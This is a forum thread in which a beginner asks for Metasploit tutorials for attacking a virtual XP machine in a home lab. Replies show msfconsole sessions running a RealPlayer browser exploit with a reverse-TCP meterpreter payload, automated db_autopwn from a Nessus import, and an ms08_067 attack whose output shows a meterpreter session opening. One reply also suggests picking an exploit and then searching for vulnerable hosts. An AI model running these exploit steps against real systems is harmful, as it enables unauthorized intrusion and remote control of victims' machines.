Sign in to follow this  
Followers 0
sector-xero

Metasploit Framework Help

7 posts in this topic

Hey guys, first and foremost I hope you guys are having a nice Thanksgiving this year.

I would like to ask if any of you guys have any nice online tutorials on metasploit. Exclude links from Irongeeks and Metasploit unleashed because I've already been examining them.

Do you have any easy to digest tutorials out there?

I am trying to exploit a virtual XP SP2 box, from a virtual BT|4 box.

Do you guys use command line, or GUI. I find them both confusing.

0

Share this post


Link to post
Share on other sites

Hey guys, first and foremost I hope you guys are having a nice Thanksgiving this year.

I would like to ask if any of you guys have any nice online tutorials on metasploit. Exclude links from Irongeeks and Metasploit unleashed because I've already been examining them.

Do you have any easy to digest tutorials out there?

I am trying to exploit a virtual XP SP2 box, from a virtual BT|4 box.

Do you guys use command line, or GUI. I find them both confusing.

I haven't used the gui myself. I find the module descriptions on the main-site pretty helpful. As an example here's what they say about a real-player exploit


$ msfconsole

## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##

msf > use exploit/windows/browser/realplayer_smil
msf exploit(realplayer_smil) > show payloads
msf exploit(realplayer_smil) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(realplayer_smil) > set LHOST [MY IP ADDRESS]
msf exploit(realplayer_smil) > exploit

Looks pretty simple. Just remember RHOST is what you want to attack, LHOST is you and you don't have to set that all the time only when you use exploits that depend on it. PAYLOAD is the buffer-overflow payload when you use such exploits. From there things are pretty well explained from their descriptions.

Edited by SigFLUP
0

Share this post


Link to post
Share on other sites

I believe there is an actual manual that comes with metaploit. You can also look through the code which can be a pain in the ass since it's so modularized or use the help functionality within metasploit itself.

0

Share this post


Link to post
Share on other sites

So I'm just going to ask. How do you find out that a system is exploitable?

So far from what I've learned it is by doing different types of verbose NMAP scans. Which will sometimes give you the service that is running.

Is there other ways you scan a system to see if it is vulnerable?

0

Share this post


Link to post
Share on other sites

So I'm just going to ask. How do you find out that a system is exploitable?

So far from what I've learned it is by doing different types of verbose NMAP scans. Which will sometimes give you the service that is running.

Is there other ways you scan a system to see if it is vulnerable?

There are automated systems out there, I don't really use them myself so I'm un-aware of the recent ones. Satan is one, for instance but that's pretty old. More typically then not people choose an exploit and then search for hosts that are vulnerable. There are some version-finding modules for metasploit, which is nice for finding out what versions people are running so that you can ascertain what may or may not be exploitable. It's always a challenge, right. Telnet to your hosts services and see if there's version information in it's answer- do things like that. I know there's a pauldotcom.com episode where they talk specifically about automated vulnerability detection, I don't know which one though. Best of luck mate

0

Share this post


Link to post
Share on other sites

For finding vulnerabilities I would checkout Nessus or SAINT.

What's cool about using Nessus is that you can load an exported Nessus scan right into Metasploit making the process much more automated.

autopwn using an exported NBE Nessus scan file against a Windows 2000 Server pansy box.


msf > db_create
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
msf > db_import_nessus_nbe /root/nessus1026.nbe
msf > db_services
[*] Time: 2009-11-26 15:33:20 -0800 Service: host=192.168.1.107 port=139 proto=tcp state=up name=netbios-ssn
[snip]
[*] Time: 2009-11-26 15:33:23 -0800 Service: host=192.168.1.107 port=135 proto=udp state=up name=epmap
msf > db_vulns
[*] Time: 2009-11-26 15:33:20 -0800 Vuln: host=192.168.1.107 port=139 proto=tcp name=NSS-11011 refs=
[snip]
[*] Time: 2009-11-26 15:33:25 -0800 Vuln: host=192.168.1.107 port=445 proto=tcp name=NSS-11110 refs=CVE-2002-0724,BID-5556,OSVDB-2074
msf > db_autopwn -p -t -e

A more manual exploit against a Windows 2000 Server pansy box.


msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.107
RHOST => 192.168.1.107
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.112
LHOST => 192.168.1.112
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2000 Service Pack 0 - 4 - lang:English
[*] Selected Target: Windows 2000 Universal
[*] Triggering the vulnerability...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.112:46190 -> 192.168.1.107:4444)

meterpreter >

Edited by rocky
0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0